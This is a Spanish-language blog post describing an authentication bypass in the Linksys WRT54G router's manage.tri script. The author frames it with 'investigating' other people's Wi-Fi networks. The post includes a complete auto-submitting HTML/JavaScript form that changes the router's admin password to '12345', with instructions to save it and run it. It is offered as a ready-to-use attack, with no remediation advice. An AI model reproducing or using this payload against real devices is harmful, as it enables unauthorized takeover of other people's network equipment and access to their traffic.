Romper password del WRT54G

Hace unos días "investigando" un par de redes Wifi, entré a una que tenía como router el WRT54G un router bastante lindo pero con una falla enorme que me permitió cambiarle la clave de acceso sin siquiera tener la clave original.

Se trata de una vulnerabilidad del router que no comprueba la autenticación cuando va a ejecutar un script.

Pasamos en limpio, uno cuando va cambiando cosas dentro de una interfaz gráfica va introduciendo valores, datos y demás, luego va al popular botón "Save", "Guardar", "Ok", etc... y todos los datos que fuimos poniendo son enviados mediante POST a un script que los ejecuta.

El sitio que nos pide los datos a modificar exige autenticación, pero el script que realmente los cambia no comprueba que estemos autenticados.

Aquí el script facilito para cambiarle la clave a un WRT54G (obviamente tenemos que tener acceso al router desde la red local) salvo que el router tuviera activada la opción de administración remota, pero sería algo raro..

Es tan simple como copiar el código de aquí abajo, guardarlo como HTML y ejecutarlo.

<html>
<form name="f" action="http://192.168.1.1/manage.tri" method="POST">
<input type="hidden" name="remote_mgt_https" value="0">
<input type="hidden" name="http_enable" value="1">
<input type="hidden" name="https_enable" value="0">
<input type="hidden" name="PasswdModify" value="1">
<input type="hidden" name="http_passwd" value="12345">
<input type="hidden" name="http_passwdConfirm" value="12345">
<input type="hidden" name="_http_enable" value="1">
<input type="hidden" name="web_wl_filter" value="1">
<input type="hidden" name="remote_management" value="0">
<input type="hidden" name="upnp_enable" value="1">
<input type="hidden" name="layout" value="en">
</form>


<script type="text/javascript">
document.f.submit();
</script>
</html>


Listo, al ejecutarlo vamos a cambiarle la clave al router por "12345" y el usuario va a ser "admin". ¿Fácil no?

Entradas populares de este blog

Trinity Rescue Kit: Tutorial para eliminar la contraseña de administrador en Windows

Cómo extraer el handshake WPA/WPA2 de archivos de captura grandes

HTTP Fingerprinting